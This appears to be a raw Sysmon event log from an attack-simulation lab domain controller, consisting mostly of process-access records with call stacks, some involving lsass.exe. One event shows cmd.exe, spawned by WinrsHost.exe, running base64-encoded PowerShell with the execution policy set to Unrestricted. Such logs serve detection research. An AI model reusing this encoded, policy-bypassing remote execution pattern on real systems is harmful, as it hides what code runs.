15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9300-000000008801}1164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7CA7-5FA1-9100-000000008801}4804916C:\Windows\system32\WinrsHost.exe{D28789B6-7CA7-5FA1-9300-000000008801}1164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.226{D28789B6-7CA7-5FA1-9300-000000008801}1164C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-1500-000000008801}13361668C:\Windows\system32\svchost.exe{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.197{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.197{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9200-000000008801}5048C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.182{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 